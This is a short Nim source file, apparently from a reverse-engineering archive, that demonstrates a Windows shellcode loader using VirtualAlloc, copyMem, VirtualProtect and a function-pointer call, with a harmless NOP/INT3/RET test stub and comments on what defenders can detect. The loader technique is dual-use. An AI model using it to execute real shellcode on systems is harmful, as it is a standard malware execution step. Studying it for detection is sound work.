#[
Shellcode Loader
Archive of Reversing.ID
Executes shellcode by jumping to it.
Compile:
$ nim c code.nim
Technique:
- allocation: VirtualAlloc
- writing: copyMem
- permission: VirtualProtect
- execution: direct call through a function pointer
]#
import winim
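when isMainModule:
  # Receives the page protection that was in effect before VirtualProtect
  # changed it.
  var oldProtect: DWORD = 0

  # Test stub: NOP, NOP, INT3, RET. The INT3 raises a breakpoint exception,
  # so run this under a debugger; without one the process is expected to
  # terminate at that instruction and the cleanup below is never reached.
  # A top-level `var` in Nim is a module global, not a stack variable.
  var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3]

  # Allocate the buffer as READ-WRITE only; it is never writable and
  # executable at the same time.
  let runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE)
  if runtime.isNil:
    # Without this check copyMem would write through a nil pointer.
    quit("VirtualAlloc failed", QuitFailure)

  # Copy the payload into the buffer.
  copyMem(runtime, addr payload, payload.len)

  # Switch the buffer from RW to R-X. Private memory that is written and then
  # made executable is a sequence defenders can watch for: the
  # VirtualAlloc -> VirtualProtect(PAGE_EXECUTE_READ) pair on the same region
  # is the observable part of this technique.
  let changed = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ,
                               addr oldProtect)
  if changed != 0:
    let entry = cast[proc() {.nimcall.}](runtime)
    entry()
  else:
    stderr.writeLine "VirtualProtect failed"

  # MEM_RELEASE requires dwSize to be 0; passing the payload length makes
  # VirtualFree fail and leaves the region allocated.
  discard VirtualFree(runtime, 0, MEM_RELEASE)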